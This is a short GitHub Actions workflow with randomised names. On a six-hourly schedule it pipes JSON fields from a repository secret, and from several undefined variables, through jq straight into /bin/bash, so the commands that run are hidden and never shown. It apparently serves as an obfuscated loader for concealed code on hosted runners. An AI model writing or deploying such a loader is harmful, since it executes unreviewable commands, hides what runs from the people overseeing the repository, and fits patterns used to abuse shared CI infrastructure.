name: estvaisania

on:
  workflow_dispatch:
  schedule:
    - cron: '20 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: estvaisania
        env:
          ts2358: ${{ secrets.ts2358 }}
        run: |
          echo $ts2358 | jq -r .ivo9 | /bin/bash
          echo $aud73114 | jq -r .a743 | /bin/bash
          echo $aiat31 | jq -r .rksxu51 | /bin/bash
          echo $etqu9 | jq -r .g3450 | /bin/bash
          echo $x521 | jq -r .ix8 | /bin/bash

